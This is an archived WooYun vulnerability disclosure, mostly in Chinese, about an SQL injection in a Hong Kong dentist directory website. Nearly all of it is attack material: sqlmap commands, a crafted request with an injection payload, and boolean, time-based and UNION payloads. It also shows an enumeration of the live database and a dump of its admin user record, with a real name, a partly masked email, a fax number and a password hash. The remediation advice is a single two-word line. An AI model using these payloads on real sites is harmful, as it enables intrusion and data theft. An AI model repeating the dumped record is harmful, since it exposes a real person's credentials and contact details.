乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
香港牙醫網存在SQL注入漏洞
測試地址:http://**.**.**.**/index.php?actiontype=search&language=eng&dentist_name=hui&clinic_dist=2
sqlmap -r 3.txt -p clinic_dist
3.txt:GET /index.php?actiontype=search&language=eng&dentist_name=hui&clinic_dist=222%27%20or%20(select%201)%20and%20%271%27=%271 HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=34d7102b2a211b4e59ccc39880963bcfConnection: keep-alive
sqlmap -r 3.txt -p clinic_dist -D hkdentis_aosDBdentist -T hkdentists_users --dump
---Parameter: clinic_dist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND 4779=4779 AND 'UBUb'='UBUb Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND (SELECT * FROM (SELECT(SLEEP(5)))emwE) AND 'Ibdz'='Ibdz Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a707671,0x586f68664d4d4c597870,0x7170706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: Apacheback-end DBMS: MySQL 5.0.12current user: 'aosDBdentist@localhost'current database: 'hkdentis_aosDBdentist'hostname: '**.**.**.**'current user is DBA: Falsedatabase management system users [1]:[*] 'aosDBdentist'@'localhost'back-end DBMS: MySQL 5.0.12Database: hkdentis_aosDBdentist[12 tables]+--------------------------+| aos_directory_dchk || aos_hk_area || hkdentists_advertisement || hkdentists_clinic || hkdentists_dentist_quali || hkdentists_dentists || hkdentists_district || hkdentists_documents || hkdentists_licenses || hkdentists_qualification || hkdentists_searchlog || hkdentists_users |+--------------------------+web application technology: Apacheback-end DBMS: MySQL 5.0.12Database: hkdentis_aosDBdentistTable: hkdentists_users[17 columns]+------------+--------------+| Column | Type |+------------+--------------+| address1 | varchar(100) || address2 | varchar(100) || city | varchar(50) || email | varchar(50) || fax | varchar(30) || firstname | varchar(50) || id | int(11) || jobtitle | varchar(50) || last_login | int(11) || lastname | varchar(50) || login_name | varchar(50) || mobile | varchar(30) || password | varchar(50) || phone | varchar(30) || role | tinyint(1) || status | tinyint(4) || title | varchar(10) |+------------+--------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: clinic_dist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND 4779=4779 AND 'UBUb'='UBUb Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND (SELECT * FROM (SELECT(SLEEP(5)))emwE) AND 'Ibdz'='Ibdz Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a707671,0x586f68664d4d4c597870,0x7170706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: Apacheback-end DBMS: MySQL 5.0.12Database: hkdentis_aosDBdentistTable: hkdentists_users[1 entry]+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+| id | fax | city | role | title | phone | email | status | mobile | address1 | address2 | lastname | jobtitle | password | firstname | login_name | last_login |+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+| 1 | 30072787 | Hong Kong | 1 | Mr. | <blank> | chester@**.**.**.** | 1 | <blank> | <blank> | <blank> | Cheng | Programmer | f4d0fcce6d1c8bf3bd19ac39da0bfed6 | Chester | admin | 1449221493 |+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+
增加過濾
危害等级:中
漏洞Rank:10
确认时间:2015-12-18 18:19
已將事件通知有關機構
暂无